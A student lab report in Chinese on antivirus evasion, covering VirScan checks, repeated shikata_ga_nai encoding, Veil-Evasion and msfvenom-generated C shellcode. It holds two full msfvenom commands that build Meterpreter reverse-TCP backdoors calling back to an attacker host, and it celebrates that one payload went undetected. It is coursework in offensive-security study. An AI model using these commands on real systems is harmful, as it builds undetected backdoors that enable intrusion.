20155235 《网络攻防》 实验三 免杀原理与实践 实验报告
实验目的
通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。
实验内容
(1)用VirScan来检测后门
(2)Msfvenom使用编码器
(3)Veil-Evasion
(4)C语言调用Shellcode
实验一 用VirScan来检测后门
按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况
让我十分的震惊了
任务二 Msfvenom使用编码器
重复编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
结果一样,内心崩溃。
任务三 Veil-Evasion
安装Veil-Evasion
因为我的虚拟机不能直接通过 sudo apt-get install 安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
使用Veil-Evasion
输入 veil ,用 use evasion , list payloads ,进入到payloads模板界面,经过一番操作后,成功生成
任务四 C语言调用Shellcode
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c 生成C语言代码,C语言代码就不贴了
回连监听
用 VirScan检测,结果为
经过5次重复编译后,用VirScan检测结果为
后记
实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!